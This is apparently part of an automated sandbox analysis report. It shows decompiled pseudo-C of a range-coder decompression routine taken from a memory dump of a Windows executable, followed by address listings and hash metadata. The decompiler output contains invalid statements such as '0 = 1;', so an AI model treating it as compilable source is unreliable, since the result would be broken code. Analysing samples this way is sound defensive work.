                                                                                                                          							_v136 = 0x12;
                                                                                                                          							goto L135;
                                                                                                                          						case 0x12:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v92;
                                                                                                                          								_v136 = 0x13;
                                                                                                                          								__esi = _v92 + 2;
                                                                                                                          								L135:
                                                                                                                          								_v88 = _t626;
                                                                                                                          								goto L136;
                                                                                                                          							}
                                                                                                                          							__eax = _v80;
                                                                                                                          							_v52 = _v52 & 0x00000000;
                                                                                                                          							__ecx = _v92;
                                                                                                                          							__eax = _v80 << 4;
                                                                                                                          							__eflags = __eax;
                                                                                                                          							__eax = _v92 + __eax + 4;
                                                                                                                          							goto L133;
                                                                                                                          						case 0x13:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								_t475 =  &_v92;
                                                                                                                          								 *_t475 = _v92 + 0x204;
                                                                                                                          								__eflags =  *_t475;
                                                                                                                          								_v52 = 0x10;
                                                                                                                          								_v68 = 8;
                                                                                                                          								L147:
                                                                                                                          								_v128 = 0x14;
                                                                                                                          								goto L148;
                                                                                                                          							}
                                                                                                                          							__eax = _v80;
                                                                                                                          							__ecx = _v92;
                                                                                                                          							__eax = _v80 << 4;
                                                                                                                          							_v52 = 8;
                                                                                                                          							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                          							L133:
                                                                                                                          							_v92 = __eax;
                                                                                                                          							_v68 = 3;
                                                                                                                          							goto L147;
                                                                                                                          						case 0x14:
                                                                                                                          							_v52 = _v52 + __ebx;
                                                                                                                          							__eax = _v132;
                                                                                                                          							goto L143;
                                                                                                                          						case 0x15:
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags = _v60 - 7;
                                                                                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          							__al = __al & 0x000000fd;
                                                                                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							goto L123;
                                                                                                                          						case 0x16:
                                                                                                                          							__eax = _v52;
                                                                                                                          							__eflags = __eax - 4;
                                                                                                                          							if(__eax >= 4) {
                                                                                                                          								_push(3);
                                                                                                                          								_pop(__eax);
                                                                                                                          							}
                                                                                                                          							__ecx = _v8;
                                                                                                                          							_v68 = 6;
                                                                                                                          							__eax = __eax << 7;
                                                                                                                          							_v128 = 0x19;
                                                                                                                          							_v92 = __eax;
                                                                                                                          							goto L148;
                                                                                                                          						case 0x17:
                                                                                                                          							L148:
                                                                                                                          							__eax = _v68;
                                                                                                                          							_v84 = 1;
                                                                                                                          							_v76 = _v68;
                                                                                                                          							goto L152;
                                                                                                                          						case 0x18:
                                                                                                                          							L149:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 0x18;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v116;
                                                                                                                          							__eax = _v16;
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							__ecx =  *_v116 & 0x000000ff;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							_t490 =  &_v116;
                                                                                                                          							 *_t490 = _v116 + 1;
                                                                                                                          							__eflags =  *_t490;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L151:
                                                                                                                          							_t493 =  &_v76;
                                                                                                                          							 *_t493 = _v76 - 1;
                                                                                                                          							__eflags =  *_t493;
                                                                                                                          							L152:
                                                                                                                          							__eflags = _v76;
                                                                                                                          							if(_v76 <= 0) {
                                                                                                                          								__ecx = _v68;
                                                                                                                          								__ebx = _v84;
                                                                                                                          								0 = 1;
                                                                                                                          								__eax = 1 << __cl;
                                                                                                                          								__ebx = _v84 - (1 << __cl);
                                                                                                                          								__eax = _v128;
                                                                                                                          								_v72 = __ebx;
                                                                                                                          								L143:
                                                                                                                          								_v140 = _t561;
                                                                                                                          								goto L3;
                                                                                                                          							}
                                                                                                                          							__eax = _v84;
                                                                                                                          							_v20 = _v20 >> 0xb;
                                                                                                                          							__edx = _v84 + _v84;
                                                                                                                          							__eax = _v92;
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							_v88 = __esi;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                          							__eflags = _v16 - __ecx;
                                                                                                                          							if(_v16 >= __ecx) {
                                                                                                                          								_v20 = _v20 - __ecx;
                                                                                                                          								_v16 = _v16 - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eax = __eax - __ecx;
                                                                                                                          								__edx = __edx + 1;
                                                                                                                          								__eflags = __edx;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          								_v84 = __edx;
                                                                                                                          							} else {
                                                                                                                          								_v20 = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								_v84 = _v84 << 1;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L151;
                                                                                                                          							} else {
                                                                                                                          								goto L149;
                                                                                                                          							}
                                                                                                                          						case 0x19:
                                                                                                                          							__eflags = __ebx - 4;
                                                                                                                          							if(__ebx < 4) {
                                                                                                                          								_v48 = __ebx;
                                                                                                                          								L122:
                                                                                                                          								_t399 =  &_v48;
                                                                                                                          								 *_t399 = _v48 + 1;
                                                                                                                          								__eflags =  *_t399;
                                                                                                                          								L123:
                                                                                                                          								__eax = _v48;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								if(__eax == 0) {
                                                                                                                          									_v52 = _v52 | 0xffffffff;
                                                                                                                          									goto L173;
                                                                                                                          								}
                                                                                                                          								__eflags = __eax - _v100;
                                                                                                                          								if(__eax > _v100) {
                                                                                                                          									goto L174;
                                                                                                                          								}
                                                                                                                          								_v52 = _v52 + 2;
                                                                                                                          								__eax = _v52;
                                                                                                                          								_t406 =  &_v100;
                                                                                                                          								 *_t406 = _v100 + _v52;
                                                                                                                          								__eflags =  *_t406;
                                                                                                                          								goto L126;
                                                                                                                          							}
                                                                                                                          							__ecx = __ebx;
                                                                                                                          							__eax = __ebx;
                                                                                                                          							__ecx = __ebx >> 1;
                                                                                                                          							__eax = __ebx & 0x00000001;
                                                                                                                          							__ecx = (__ebx >> 1) - 1;
                                                                                                                          							__al = __al | 0x00000002;
                                                                                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          							__eflags = __ebx - 0xe;
                                                                                                                          							_v48 = __eax;
                                                                                                                          							if(__ebx >= 0xe) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								_v76 = __ecx;
                                                                                                                          								L105:
                                                                                                                          								__eflags = _v76;
                                                                                                                          								if(_v76 <= 0) {
                                                                                                                          									__eax = __eax + __ebx;
                                                                                                                          									_v68 = 4;
                                                                                                                          									_v48 = __eax;
                                                                                                                          									__eax = _v8;
                                                                                                                          									__eax = _v8 + 0x644;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									L111:
                                                                                                                          									__ebx = 0;
                                                                                                                          									_v92 = __eax;
                                                                                                                          									_v84 = 1;
                                                                                                                          									_v72 = 0;
                                                                                                                          									_v76 = 0;
                                                                                                                          									L115:
                                                                                                                          									__eax = _v68;
                                                                                                                          									__eflags = _v76 - _v68;
                                                                                                                          									if(_v76 >= _v68) {
                                                                                                                          										_t397 =  &_v48;
                                                                                                                          										 *_t397 = _v48 + __ebx;
                                                                                                                          										__eflags =  *_t397;
                                                                                                                          										goto L122;
                                                                                                                          									}
                                                                                                                          									__eax = _v84;
                                                                                                                          									_v20 = _v20 >> 0xb;
                                                                                                                          									__edi = _v84 + _v84;
                                                                                                                          									__eax = _v92;
                                                                                                                          									__esi = __edi + __eax;
                                                                                                                          									_v88 = __esi;
                                                                                                                          									__ax =  *__esi;
                                                                                                                          									__ecx = __ax & 0x0000ffff;
                                                                                                                          									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                          									__eflags = _v16 - __edx;
                                                                                                                          									if(_v16 >= __edx) {
                                                                                                                          										__ecx = 0;
                                                                                                                          										_v20 = _v20 - __edx;
                                                                                                                          										__ecx = 1;
                                                                                                                          										_v16 = _v16 - __edx;
                                                                                                                          										__ebx = 1;
                                                                                                                          										__ecx = _v76;
                                                                                                                          										__ebx = 1 << __cl;
                                                                                                                          										__ecx = 1 << __cl;
                                                                                                                          										__ebx = _v72;
                                                                                                                          										__ebx = _v72 | __ecx;
                                                                                                                          										__cx = __ax;
                                                                                                                          										__cx = __ax >> 5;
                                                                                                                          										__eax = __eax - __ecx;
                                                                                                                          										__edi = __edi + 1;
                                                                                                                          										__eflags = __edi;
                                                                                                                          										_v72 = __ebx;
                                                                                                                          										 *__esi = __ax;
                                                                                                                          										_v84 = __edi;
                                                                                                                          									} else {
                                                                                                                          										_v20 = __edx;
                                                                                                                          										0x800 = 0x800 - __ecx;
                                                                                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          										_v84 = _v84 << 1;
                                                                                                                          										 *__esi = __dx;
                                                                                                                          									}
                                                                                                                          									__eflags = _v20 - 0x1000000;
                                                                                                                          									if(_v20 >= 0x1000000) {
                                                                                                                          										L114:
                                                                                                                          										_t374 =  &_v76;
                                                                                                                          										 *_t374 = _v76 + 1;
                                                                                                                          										__eflags =  *_t374;
                                                                                                                          										goto L115;
                                                                                                                          									} else {
                                                                                                                          										goto L112;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								__ecx = _v16;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								_v20 = _v20 >> 1;
                                                                                                                          								__eflags = _v16 - _v20;
                                                                                                                          								_v72 = __ebx;
                                                                                                                          								if(_v16 >= _v20) {
                                                                                                                          									__ecx = _v20;
                                                                                                                          									_v16 = _v16 - _v20;
                                                                                                                          									__ebx = __ebx | 0x00000001;
                                                                                                                          									__eflags = __ebx;
                                                                                                                          									_v72 = __ebx;
                                                                                                                          								}
                                                                                                                          								__eflags = _v20 - 0x1000000;
                                                                                                                          								if(_v20 >= 0x1000000) {
                                                                                                                          									L104:
                                                                                                                          									_t344 =  &_v76;
                                                                                                                          									 *_t344 = _v76 - 1;
                                                                                                                          									__eflags =  *_t344;
                                                                                                                          									goto L105;
                                                                                                                          								} else {
                                                                                                                          									goto L102;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__edx = _v8;
                                                                                                                          							__eax = __eax - __ebx;
                                                                                                                          							_v68 = __ecx;
                                                                                                                          							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                          							goto L111;
                                                                                                                          						case 0x1a:
                                                                                                                          							L58:
                                                                                                                          							__eflags = _v104;
                                                                                                                          							if(_v104 == 0) {
                                                                                                                          								_v140 = 0x1a;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__ecx = _v108;
                                                                                                                          							__al = _v96;
                                                                                                                          							__edx = _v12;
                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                          							_v108 = _v108 + 1;
                                                                                                                          							_v104 = _v104 - 1;
                                                                                                                          							 *_v108 = __al;
                                                                                                                          							__ecx = _v24;
                                                                                                                          							 *(_v12 + __ecx) = __al;
                                                                                                                          							__eax = __ecx + 1;
                                                                                                                          							__edx = 0;
                                                                                                                          							_t197 = __eax % _v120;
                                                                                                                          							__eax = __eax / _v120;
                                                                                                                          							__edx = _t197;
                                                                                                                          							goto L82;
                                                                                                                          						case 0x1b:
                                                                                                                          							L78:
                                                                                                                          							__eflags = _v104;
                                                                                                                          							if(_v104 == 0) {
                                                                                                                          								_v140 = 0x1b;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							__eax = _v24;
                                                                                                                          							__eax = _v24 - _v48;
                                                                                                                          							__eflags = __eax - _v120;
                                                                                                                          							if(__eax >= _v120) {
                                                                                                                          								__eax = __eax + _v120;
                                                                                                                          								__eflags = __eax;
                                                                                                                          							}
                                                                                                                          							__edx = _v12;
                                                                                                                          							__cl =  *(__edx + __eax);
                                                                                                                          							__eax = _v24;
                                                                                                                          							_v96 = __cl;
                                                                                                                          							 *(__edx + __eax) = __cl;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__edx = 0;
                                                                                                                          							_t280 = __eax % _v120;
                                                                                                                          							__eax = __eax / _v120;
                                                                                                                          							__edx = _t280;
                                                                                                                          							__eax = _v108;
                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                          							_v108 = _v108 + 1;
                                                                                                                          							_t289 =  &_v104;
                                                                                                                          							 *_t289 = _v104 - 1;
                                                                                                                          							__eflags =  *_t289;
                                                                                                                          							 *_v108 = __cl;
                                                                                                                          							L82:
                                                                                                                          							_v24 = __edx;
                                                                                                                          							goto L83;
                                                                                                                          						case 0x1c:
                                                                                                                          							while(1) {
                                                                                                                          								L126:
                                                                                                                          								__eflags = _v104;
                                                                                                                          								if(_v104 == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax = _v24;
                                                                                                                          								__eax = _v24 - _v48;
                                                                                                                          								__eflags = __eax - _v120;
                                                                                                                          								if(__eax >= _v120) {
                                                                                                                          									__eax = __eax + _v120;
                                                                                                                          									__eflags = __eax;
                                                                                                                          								}
                                                                                                                          								__edx = _v12;
                                                                                                                          								__cl =  *(__edx + __eax);
                                                                                                                          								__eax = _v24;
                                                                                                                          								_v96 = __cl;
                                                                                                                          								 *(__edx + __eax) = __cl;
                                                                                                                          								__eax = __eax + 1;
                                                                                                                          								__edx = 0;
                                                                                                                          								_t420 = __eax % _v120;
                                                                                                                          								__eax = __eax / _v120;
                                                                                                                          								__edx = _t420;
                                                                                                                          								__eax = _v108;
                                                                                                                          								_v108 = _v108 + 1;
                                                                                                                          								_v104 = _v104 - 1;
                                                                                                                          								_v52 = _v52 - 1;
                                                                                                                          								__eflags = _v52;
                                                                                                                          								 *_v108 = __cl;
                                                                                                                          								_v24 = _t420;
                                                                                                                          								if(_v52 > 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									L83:
                                                                                                                          									_v140 = 2;
                                                                                                                          									goto L3;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_v140 = 0x1c;
                                                                                                                          							L173:
                                                                                                                          							_push(0x22);
                                                                                                                          							_pop(_t574);
                                                                                                                          							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                          							return 0;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L174:
                                                                                                                          				_t538 = _t537 | 0xffffffff;
                                                                                                                          				return _t538;
                                                                                                                          			}










































                                                                                                                          0x00405f16
                                                                                                                          0x00405f19
                                                                                                                          0x00405f43
                                                                                                                          0x00405f49
                                                                                                                          0x00405f50
                                                                                                                          0x00000000
                                                                                                                          0x00405f50
                                                                                                                          0x00405f1b
                                                                                                                          0x00405f1f
                                                                                                                          0x00405f22
                                                                                                                          0x00405f27
                                                                                                                          0x00405f27
                                                                                                                          0x00405f32
                                                                                                                          0x00405f38
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f3d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f82
                                                                                                                          0x00405f88
                                                                                                                          0x00405f8b
                                                                                                                          0x00405f98
                                                                                                                          0x00405fa0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f57
                                                                                                                          0x00405f57
                                                                                                                          0x00405f5b
                                                                                                                          0x004067a6
                                                                                                                          0x00000000
                                                                                                                          0x004067a6
                                                                                                                          0x00405f67
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f75
                                                                                                                          0x00405f78
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f7e
                                                                                                                          0x00405f80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x0040661d
                                                                                                                          0x00406623
                                                                                                                          0x00406626
                                                                                                                          0x00406629
                                                                                                                          0x00406643
                                                                                                                          0x00406646
                                                                                                                          0x0040664c
                                                                                                                          0x00406657
                                                                                                                          0x00406657
                                                                                                                          0x00406659
                                                                                                                          0x0040662b
                                                                                                                          0x0040662b
                                                                                                                          0x0040663a
                                                                                                                          0x0040663e
                                                                                                                          0x0040663e
                                                                                                                          0x0040665c
                                                                                                                          0x00406663
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406665
                                                                                                                          0x00406665
                                                                                                                          0x00406669
                                                                                                                          0x00406818
                                                                                                                          0x00000000
                                                                                                                          0x00406818
                                                                                                                          0x00406675
                                                                                                                          0x0040667c
                                                                                                                          0x00406684
                                                                                                                          0x00406684
                                                                                                                          0x00406684
                                                                                                                          0x00406687
                                                                                                                          0x0040668a
                                                                                                                          0x0040668a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa8
                                                                                                                          0x00405faa
                                                                                                                          0x00405fad
                                                                                                                          0x0040601e
                                                                                                                          0x00406021
                                                                                                                          0x00406024
                                                                                                                          0x0040602b
                                                                                                                          0x00406035
                                                                                                                          0x00000000
                                                                                                                          0x00406035
                                                                                                                          0x00405faf
                                                                                                                          0x00405fb3
                                                                                                                          0x00405fb6
                                                                                                                          0x00405fb8
                                                                                                                          0x00405fbb
                                                                                                                          0x00405fbe
                                                                                                                          0x00405fc0
                                                                                                                          0x00405fc3
                                                                                                                          0x00405fc5
                                                                                                                          0x00405fca
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd0
                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe5
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff5
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x00000000
                                                                                                                          0x00406018
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406000
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062b1
                                                                                                                          0x004062b5
                                                                                                                          0x004062d8
                                                                                                                          0x004062db
                                                                                                                          0x004062de
                                                                                                                          0x004062e8
                                                                                                                          0x004062b7
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bd
                                                                                                                          0x004062c0
                                                                                                                          0x004062cd
                                                                                                                          0x004062d0
                                                                                                                          0x004062d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062f4
                                                                                                                          0x004062f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062fe
                                                                                                                          0x00406302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x0040630e
                                                                                                                          0x00406311
                                                                                                                          0x00406315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406365
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406373
                                                                                                                          0x00406376
                                                                                                                          0x00406380
                                                                                                                          0x00000000
                                                                                                                          0x0040669f
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066c4
                                                                                                                          0x004066cb
                                                                                                                          0x004066d2
                                                                                                                          0x004066d2
                                                                                                                          0x00000000
                                                                                                                          0x004066d2
                                                                                                                          0x004066a1
                                                                                                                          0x004066a4
                                                                                                                          0x004066a7
                                                                                                                          0x004066aa
                                                                                                                          0x004066b1
                                                                                                                          0x004065f5
                                                                                                                          0x004065f5
                                                                                                                          0x004065f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040678c
                                                                                                                          0x0040678f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063c6
                                                                                                                          0x004063c8
                                                                                                                          0x004063cf
                                                                                                                          0x004063d0
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x004063e7
                                                                                                                          0x004063e7
                                                                                                                          0x004063e8
                                                                                                                          0x004063eb
                                                                                                                          0x004063f2
                                                                                                                          0x004063f5
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066e8
                                                                                                                          0x004066e8
                                                                                                                          0x004066ec
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00406824
                                                                                                                          0x004066f2
                                                                                                                          0x004066f5
                                                                                                                          0x004066f8
                                                                                                                          0x004066fc
                                                                                                                          0x004066ff
                                                                                                                          0x00406705
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00406690
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                          • Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
                                                                                                                          • Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                          • Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406247() {
                                                                                                                          				signed int _t539;
                                                                                                                          				unsigned short _t540;
                                                                                                                          				signed int _t541;
                                                                                                                          				void _t542;
                                                                                                                          				signed int _t543;
                                                                                                                          				signed int _t544;
                                                                                                                          				signed int _t573;
                                                                                                                          				signed int _t576;
                                                                                                                          				signed int _t597;
                                                                                                                          				signed int* _t614;
                                                                                                                          				void* _t621;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t621 - 0x40) != 1) {
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                          						_t539 =  *(_t621 - 4) + 0x664;
